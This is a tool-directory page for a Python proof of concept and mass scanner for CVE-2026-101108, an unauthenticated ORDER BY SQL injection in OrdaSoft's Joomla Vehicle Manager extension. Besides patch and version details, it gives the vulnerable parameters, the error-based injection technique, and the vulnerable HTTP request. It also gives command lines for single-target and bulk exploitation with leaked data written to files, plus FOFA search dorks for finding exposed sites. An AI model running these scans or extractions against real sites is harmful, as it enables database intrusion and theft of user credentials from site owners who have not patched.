Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-101108 — Python 3 PoC and mass scanner for CVE-2026-101108, an unauthenticated ORDER BY SQL injection in OrdaSoft Joomla Vehicle Manager <=6.5.7 (com_vehiclemanager). | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-101108
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubmurrez/cve-2026-101108

CVE-2026-101108

Python 3 PoC and mass scanner for CVE-2026-101108, an unauthenticated ORDER BY SQL injection in OrdaSoft Joomla Vehicle Manager <=6.5.7 (com_vehiclemanager).

14 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

CVE-2026-101108 — OrdaSoft Vehicle Manager (Free) unauthenticated SQL injection

Python 3 PoC for CVE-2026-101108 — OrdaSoft Vehicle Manager (Free) Joomla extension ≤ 6.5.7. Fixed in 6.5.8+.

PoCbithttps://pocbit.org/pocs/cve-2026-101108
Cataloghttps://pocbit.org/pocs/
Componentcom_vehiclemanager
Filesite/vehiclemanager.php
Parametersorder_field, order_direction → ORDER BY (unquoted)
AuthNone (public category / search / all-vehicles views)
CWECWE-89 SQL Injection
CVSS 4.09.3 Critical (Joomla CNA)

Vulnerability summary (Türkçe)

Vehicle Manager (Free), Joomla’da araç ilanı (kategori, arama, tüm araçlar) sunan OrdaSoft eklentisidir. 6.5.7 ve önceki sürümlerde, order_field ve order_direction sıralama parametreleri site/vehiclemanager.php içinde işlenir: girdi üzerinde kaçış (escaping) uygulanır, ancak değer tırnaksız ORDER BY ifadesine konduğu için kaçış SQLi’ye karşı etkisiz kalır (CNA açıklaması).

Saldırgan kimlik doğrulaması olmadan veritabanı okuma/yazma, Joomla kullanıcı hash’leri ve site bütünlüğü açısından kritik risk oluşturur. 6.5.8 veya daha yeni sürüme yükseltin.


Why escaping fails here

Typical Joomla/PHP code might run user input through a “sanitizer” that escapes quotes for string literals. In ORDER BY, column names and expressions are not string literals — the sort key is concatenated as SQL structure. An attacker supplies expressions such as error-based subqueries instead of a real column name. The CNA text for CVE-2026-101108 explicitly documents this escape bypass pattern.

Affected anonymous frontend entry points:

  1. Category listing (showCategory)
  2. Search (search / related tasks)
  3. All-vehicles listing (showVehicles and similar)

PoC capabilities

ModeBehavior
checkFingerprint component + manifest version, discover catid/Itemid, confirm SQLi
exploitError-based EXTRACTVALUE-style double query via ORDER BY
mass--list + -j for bulk check or bulk extract

Injection vectors tried (first successful wins in exploit):

  • order_field GET
  • order_direction GET (asc,<subquery>)
  • order_field POST
  • order_direction POST

JSONL fields: pocbit, pocbit_catalog, pocbit_page, cve, component.


Requirements

cd CVE-2026-101108
pip install -r requirements.txt

Usage

Single target

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_direction_get

Mass bulk (exploit-focused workflow)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagMeaning
--aggressiveCheck mode also attempts SELECT VERSION() leak
--subqueryInner SELECT for error-based payload (MySQL)
--vectorForce one of four ORDER BY vectors
--exploited-listTab-separated leaks on successful exploit
--no-colorPlain CLI (NO_COLOR respected)

Exit codes: exploit mode 0 when exploited: true; check mode 0 when exploitable_candidate.


Example HTTP surface

Category route (sort params appended by PoC):

GET /index.php?option=com_vehiclemanager&task=showCategory&catid=1&order_field=<payload>&order_direction=asc HTTP/1.1

Search route baseline built by PoC:

GET /index.php?option=com_vehiclemanager&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all HTTP/1.1

Version detection

When readable:

  • /administrator/components/com_vehiclemanager/vehiclemanager.xml

Version ≤ 6.5.7 → likely_vulnerable_version. ≥ 6.5.8 → patched_version.


FOFA / discovery dorks

body="option=com_vehiclemanager"
body="/components/com_vehiclemanager/" && body="Joomla"
title="Vehicle" && body="com_vehiclemanager"
body="ordasoft" && body="vehiclemanager"

Export hosts to targets.txt (one base URL per line), then check → hits → exploit on authorized assets only.


OrdaSoft batch context (Sep 2026)

Same disclosure window as Real Estate Manager CVEs (e.g. CVE-2026-100752 / CVE-2026-100753): multiple OrdaSoft Joomla extensions received SQLi/XSS fixes. If you run Vehicle Manager, patch all OrdaSoft components you deploy.

CVEProductIssueFixed
CVE-2026-101108Vehicle Manager (Free)Unauth ORDER BY SQLi6.5.8
CVE-2026-100752Real Estate ManagerUnauth ORDER BY SQLi6.7.9

Credit (CNA): Ala Arfaoui.


References

  • PoCbit CVE-2026-101108
  • CVE.report CVE-2026-101108
  • OrdaSoft Vehicle Manager
  • Legacy research: com_vehiclemanager SQLi (older versions, search parameters) — distinct from but related component surface

Legal

Authorized security testing and patch validation only.


GitHub repository description

CVE-2026-101108 PoC: OrdaSoft Joomla Vehicle Manager (Free) <=6.5.7 unauth SQLi — order_field/order_direction unquoted ORDER BY (com_vehiclemanager). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101108
Download Tool